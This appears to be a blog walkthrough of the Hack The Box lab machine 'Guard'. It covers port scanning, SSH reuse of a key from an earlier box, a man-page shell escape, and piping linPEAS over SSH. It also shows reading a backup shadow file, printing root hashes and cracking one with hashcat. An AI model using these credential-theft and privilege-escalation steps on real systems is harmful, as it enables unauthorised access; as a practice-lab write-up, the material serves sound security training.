Hello world, welcome to haxez where today I will be looking at the Hack The Box Machine Guard. Hacking this machine was incredibly fun and it didn’t take very long. Lets get straight in to it.
Guard Enumeration
First thing I always like to check is whether the box responds to ping requests. This helps to determine whether the machine is online or not.
└──╼ [★]$ sudo ping 10.10.10.50 | tee -a ping.10.10.10.50.txt
[sudo] password for joe:
PING 10.10.10.50 (10.10.10.50) 56(84) bytes of data.
64 bytes from 10.10.10.50: icmp_seq=1 ttl=63 time=37.1 ms
64 bytes from 10.10.10.50: icmp_seq=2 ttl=63 time=21.8 ms
64 bytes from 10.10.10.50: icmp_seq=3 ttl=63 time=21.9 ms
64 bytes from 10.10.10.50: icmp_seq=4 ttl=63 time=22.4 msYou may notice that I tend to pipe a lot of my commands to tee -a filename.txt. This is a habbit I got in to after a few exams. I also copy the output in to a seperate text file called notes. I tend to write the walkthroughs as I hack the machines, and it doesn’t hurt to have more than one copy of something.
We know the box is responding to pings so let’s see what services are actually listening on the box. We can do this by running an nmap scan.
└──╼ [★]$ sudo nmap -sC -sV -O -p0- 10.10.10.50 | tee -a nmap.10.10.10.50.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021–09–13 17:06 BST
Nmap scan report for 10.10.10.50
Host is up (0.023s latency).
Not shown: 65535 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2a:64:23:e0:a7:ec:1d:3b:f0:63:72:a7:d7:05:57:71 (RSA)
| 256 b3:86:5d:3d:c9:d1:70:ea:d6:3d:36:a6:c5:f2:be:5d (ECDSA)
|_ 256 c0:5b:13:0f:d6:e6:d1:71:2d:55:e2:4a:e2:27:0e:c2 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).Guard Foothold
The only thing listening on the box appears to be SSH. We could try and bruteforce it with Hydra but I don’t think that’s the intended approach. Since SSH is the only active service I’m going to assume that we should have the credentials already from a previous box. The machine Markup had an XXE vulnerability that allowed us to recover an SSH private key for the user daniel. Lets see if that works.
└──╼ [★]$ ssh -i daniel.key [email protected]
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0–88-generic x86_64)
Last login: Mon Sep 13 15:38:53 2021 from 10.10.14.31
daniel@guard:~$Lateral Movement Man
Lovely jubbly the key from the last box worked a treat. We are now on the box but no matter what I tried I couldn’t cat the user.txt file. Something funny was going on. I initially tried to get a shell through Vim as I have used that technique before turns out man was our man! By using the man command we can then “escape” to a shell by typing !bash.
And now we can capture the user flag.
daniel@guard:~$ cat user.txt
209**********************081Host Enumeration
So what’s next? there is a whole lot of file system to look through and not a lot of commands at our disposal. I tried to grab linPEAS from a self hosted Python server but anything I tried to do to download it failed.
daniel@guard:~$ curl http://10.10.14.38/leanpeas.sh
curl: (7) Couldn’t connect to server
daniel@guard:~$ ping 10.10.14.38
ping: socket: Permission denied
daniel@guard:~$ http://10.10.14.38/leanpeas.sh
bash: http://10.10.14.38/leanpeas.sh: No such file or directory
daniel@guard:~$ wget http://10.10.14.38/leanpeas.sh
— 2021–09–13 16:48:20 — http://10.10.14.38/leanpeas.sh
Connecting to 10.10.14.38:80… failed: Permission denied.
Retrying.Right, it looks like we don’t have permissions to access the socket at all. Not good. Well I guess it’s time for some SSH magic. You can pipe commands through SSH which should allow me to run linPEAS on the remote host from a script on my local system.
─[eu-vip-22]─[10.10.14.38]─[joe@parrot]─[~]
└──╼ [★]$ sudo ssh -i daniel.key [email protected] ‘bash -s’ < /Path/To/linpeas.shHonestly, nothing quite beats the feeling you get when you do something hacky and it works. Now linPEAS was running on the remote host it was time to go through the output. I noticed some interesting things.
[+] Looking for ssl/ssh files
/home/picasso/.ssh/authorized_keys /usr/lib/initramfs-tools/etc/dhcp/dhclient-enter-hooks.d/config
PermitRootLogin yes
PubkeyAuthentication yes
PasswordAuthentication yesGuard Privilege Escalation
Firstly, root could login with a password rather than requiring a public and private key pair. I’m not sure if this is going to make things harder or easier at this point but it’s good to take note of it.
[+] Looking for specific hashes inside files — less false positives (limit 70)
/var/backups/shadow:$6$2EEJjgy86KrZ.cbl$oCf1MzIsN7N9KziBNo7uYrHLueZLM7wySrsFYxlNtO5NVhfVsyWCSKiIURNUxOOwC0tm1kyQsiv93imCwLM0k1It looks like linPEAS was able to grab a hash from a backup shadow file. This has got to be the way we get on to the box as root. lets check out the backup file.
daniel@guard:~$ cat /var/backups/shadow
root:$6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbvX4pEHvx1XUzXLTBBu0jRLPeZS.69qNrPgHJ0yvc3N82hY31:18334:0:99999:7:::
daemon:*:18113:0:99999:7:::
---SNIP---
pollinate:*:18113:0:99999:7:::
sshd:*:18326:0:99999:7:::
daniel:$6$2EEJjgy86KrZ.cbl$oCf1MzIsN7N9KziBNo7uYrHLueZLM7wySrsFYxlNtO5NVhfVsyWCSKiIURNUxOOwC0tm1kyQsiv93imCwLM0k1:18326:0:99999:7:::I’ve snipped out the stuff we don’t need and you can see that the backup file contains the hashes for both root and daniel. Ok let’s grab a copy of it and crack it offline. It should be noted that I also noticed I could cat the /etc/passwd file. With that in mind I grabbed a copy of that too as I was going to use unshadow and attempt to crack it with JohnTheRipper.
└──╼ [★]$ sudo unshadow passwd.txt shadow.txt > passwords.txtUnfortunately, John didn’t like the file and was unable to crack it so I switched to hashcat with the rockyou wordlist.
└──╼ [★]$ sudo hashcat -m 1800 — force root.hash /usr/share/wordlists/rockyou.txt$6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbvX4pEHvx1XUzXLTBBu0jRLPeZS.69qNrPgHJ0yvc3N82hY31:password#1
Session……….: hashcat
Status………..: Cracked
Hash.Name……..: sha512crypt $6$, SHA512 (Unix)
Hash.Target……: $6$KIP2PX8O$7VF4mj1i.w/.sIOwyeN6LKnmeaFTgAGZtjBjRbv…82hY31
Time.Started…..: Mon Sep 13 17:57:10 2021, (1 min, 3 secs)
Time.Estimated…: Mon Sep 13 17:58:13 2021, (0 secs)
Guess.Base…….: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue……: 1/1 (100.00%)
Speed.#1………: 1751 H/s (6.91ms) @ Accel:32 Loops:512 Thr:1 Vec:4
Recovered……..: 1/1 (100.00%) Digests
Progress………: 110336/14344386 (0.77%)
Rejected………: 0/110336 (0.00%)
Restore.Point….: 110208/14344386 (0.77%)
Restore.Sub.#1…: Salt:0 Amplifier:0–1 Iteration:4608–5000
Candidates.#1….: pooh-bear -> pashaunguThe password turned out to be “password#1”. I honestly think we could have brute forced that quite quickly but Que sera, sera. We were then able to login to the machine as root and capture the root flag.
└──╼ [★]$ ssh [email protected]
[email protected]’s password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0–88-generic x86_64)
Last login: Mon Sep 13 15:50:13 2021 from 10.10.14.31
root@guard:~# cat root.txt
386*******************f681